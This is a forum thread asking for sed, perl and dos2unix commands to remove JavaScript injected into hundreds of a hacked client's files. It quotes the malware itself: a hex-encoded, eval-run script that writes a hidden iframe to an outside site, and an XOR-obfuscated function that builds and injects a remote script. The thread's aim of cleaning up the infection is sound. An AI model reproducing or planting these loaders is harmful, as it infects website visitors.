Remove JavaScript code from multiple files


We have a client whose account was hit by an FTP injection attack. Over 600 files have had this code added to them:

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr+arr[i+1],16));eval(t);</script>

::sorry, may make you scroll to the right::

I am looking for a sed (or other command) that will find this string and remove it..

Some code I have tried:

grep -rl 646f63756d6 * | xargs sed -i '/<script/,/<\/script>/d'

That one is really close, but it removes everything after <script. If there is any data after the </script>, it gets removed too, so I think it just needs some tweaking.

Thanks for any help!


---------- Post updated at 12:50 AM ---------- Previous update was at 12:00 AM ----------


I see that my first command won't work: it is meant for deleting complete lines, but sometimes there is valid code at the beginning of the line (like </html>).

So, I think I need the properly formatted find/replace command (s///). I can't seem to come up with the proper find piece.
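
For what it is worth, the reason the range form eats too much seems to be how sed handles a regex end address: it starts looking for the end pattern on the line after the one that opened the range. When <script> and </script> share a line, the range therefore keeps running until the next </script> or the end of the file. A small sketch to illustrate, using a made-up three-line file (p.html and its contents are invented for this demo):

```shell
#!/bin/sh
# Hypothetical demo file: the injected tag shares a line with </html>.
demo=$(mktemp -d)
printf '%s\n' 'top' '</html><script>bad()</script>' 'footer' > "$demo/p.html"

# Range delete: line 2 opens the range, and the search for </script>
# only starts on line 3, so lines 2 and 3 are both deleted.
sed '/<script/,/<\/script>/d' "$demo/p.html" > "$demo/range.txt"

# Substitution: only the matched text inside line 2 is removed.
sed 's#<script>.*</script>##' "$demo/p.html" > "$demo/subst.txt"

echo "--- range delete:"; cat "$demo/range.txt"
echo "--- substitution:"; cat "$demo/subst.txt"
```

The range version leaves only "top", while the substitution keeps both </html> and footer.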



You want to remove only the contents between <script> and </script>, right?



The entire statement needs to be removed, including the <script> and </script>.



Try this one:

sed 's#\(.*\)<script>\(.*\)</script>\(.*\)#\1\3#' sample.txt

Here sample.txt is the input file.
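
One caveat: as written, the substitution strips a <script>...</script> pair from every line that has one, including legitimate scripts. A minimal sketch of one way to narrow it, assuming the injected block always sits on a single line and always contains the hex marker 646f63756d6 (the demo file and its shortened payload are made up):

```shell
#!/bin/sh
# Hypothetical demo file: one legitimate script line, one injected line.
demo=$(mktemp -d)
cat > "$demo/page.html" <<'EOF'
<script>var ok = 1;</script>
</html><script>var t="";var arr="646f63756d656e74";for(i=0;i<arr.length;i+=2)t+=arr[i];</script>
EOF

# The address /646f63756d6/ limits the substitution to lines that contain
# the marker, so the legitimate script on line 1 is left untouched.
# On a marked line, everything from the first <script> to the last
# </script> is removed.
sed '/646f63756d6/ s#<script>.*</script>##' "$demo/page.html" > "$demo/clean.html"

cat "$demo/clean.html"
```

If a marked line could also hold a legitimate script, the pattern would need to be tightened further, for example by matching the start of the payload itself.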




I think that did the trick! I used:

grep -rl 646f63756d6 * | sed 's/ /\\ /g' | xargs sed -i 's#\(.*\)<script>\(.*\)</script>\(.*\)#\1\3#'

to replace a number of files in a test directory.
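
File names with spaces (or quotes) can also be handled by passing NUL-separated names from grep to xargs instead of escaping them by hand. A sketch, assuming GNU grep, xargs and sed; the demo directory and file names are invented, and -i.bak keeps a backup copy of each edited file in case the substitution removes more than intended:

```shell
#!/bin/sh
# Hypothetical demo tree with spaces in directory and file names.
demo=$(mktemp -d)
mkdir "$demo/my site"
printf '%s\n' '</html><script>var arr="646f63756d656e74";</script>' > "$demo/my site/index page.html"
printf '%s\n' '<p>clean</p>' > "$demo/my site/other.html"

# grep: -r recurse, -l list matching files only, -Z end each name with NUL.
# xargs: -0 split on NUL, -r do nothing if grep found no files.
grep -rlZ 646f63756d6 "$demo" |
  xargs -0 -r sed -i.bak '/646f63756d6/ s#<script>.*</script>##'

cat "$demo/my site/index page.html"
```

Only the file that contained the marker is edited and gets a .bak copy; other.html is never passed to sed.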

Thanks much!



Had another situation occur that was about the same as this one, except the javascript is across multiple lines (vs all on the same line like my first issue). I did get those files cleaned up, thanks again rangarasan.

This one goes more like this:

function vdch () {^M

each line ends with the ^M character, so that will probably affect the command a bit.

Is there a sed variant of the one presented that would support multiple lines of this nature?


I don't think your requirement can be fulfilled by sed alone. I would go with awk or perl.
Which language do you prefer?

First, if your file is in Unix/Linux, then remove those "^M" characters by feeding it to the "dos2unix" command.

dos2unix your_file
od -bc your_file

The "od -bc" command prints an octal dump of the file contents; ensure that you do **not** see any "\r" characters after the dos2unix command has been run on your file.

Thereafter, for removing multi-line <script> tags plus their content, you could do something like so:

$ cat -n f36
     1  this is line 1
     2  this is line 2
     3  <script> the script tags
     4  and their contents span
     5  multiple lines
     6  in this case
     7  </script>
     8  this is line 8
     9  <script> begin and close tags on same line </script>
    10  this is line 10
    11  and this is <script> begin and close tags somewhere
    12  within the line, i.e. not at the
    13  beginning and end of
    14  the line </script> line 14
    15  final line number 15
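$ perl -lne 'if (/^(.*?)<script>.*$/) {             # opening tag: print the text before it
               print $1;
               $in = 1;
             }
             if ($in and /^.*?<\/script>(.*?)$/) {   # closing tag: print any text after it
               print $1 if length $1;
               $in = 0;
             } elsif (not $in) {print}               # outside a script block: print the line
            ' f36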
this is line 1
this is line 2

this is line 8

this is line 10
and this is
 line 14
final line number 15

If you could post a sample of your data file, then that should be helpful.




Thanks much for the replies!

Here is a sample of the data found in hundreds of files; this is the end of one of the files:

function vdch() {^M
        if(document.all.length > 3) {^M
                var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');^M
                var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }^M
                var dch = document.createElement("script");^M
       = "dchid";^M
                dch.src = dchid;^M
        } else {^M
} setTimeout("vdch()",500);^M

Sometimes the <script> piece starts on its own line, but more often, it starts on the last line of the file.

I will have to get that ^M stripped out. Hopefully there is an easy way to do this on a lot of files at once?

Thanks again for any help!


If all your target files have the extension ".java" and are in only one directory "my_dir", then change to that directory and run dos2unix on all those files, like so -

cd my_dir
dos2unix *.java

If your target files are spread out in multiple directories and subdirectories thereof, then use the "find-and-exec" technique.
Change to the highest directory, i.e. a directory from where you could traverse the directory-tree and process all such java files, and then -

cd highest_dir
find . -name "*.java" -exec dos2unix {} \;

Alternatively, if you do not want to cd to any directory, and work from your current location, then you will have to specify the entire path, like so -

# fix "^M" in all java files in "/my/path/to/java/files" directory
dos2unix /my/path/to/java/files/*.java
# fix "^M" in all java files in the entire tree below "/my/highest/dir" directory
find /my/highest/dir -name "*.java" -exec dos2unix {} \;
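
If dos2unix is not installed, GNU sed can do the same job. A sketch, assuming GNU sed and grep, and assuming the affected files are *.html rather than *.java (the earlier mention of </html> suggests this, but adjust the pattern to your files); the demo tree is made up:

```shell
#!/bin/sh
# Hypothetical demo tree: one file with CRLF line endings, one without.
demo=$(mktemp -d)
mkdir "$demo/sub"
printf 'function vdch() {\r\n}\r\n' > "$demo/sub/a.html"
printf 'already unix\n' > "$demo/b.html"

# Strip one trailing CR from every line of every *.html file in the tree.
# \r in the pattern is a GNU sed extension; "{} +" batches many files
# into each sed call instead of starting one process per file.
find "$demo" -type f -name '*.html' -exec sed -i 's/\r$//' {} +

# Count the files that still contain a CR byte; 0 means all are clean.
cr=$(printf '\r')
remaining=$(grep -rl "$cr" "$demo" | wc -l)
echo "files still containing CR: $remaining"
```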

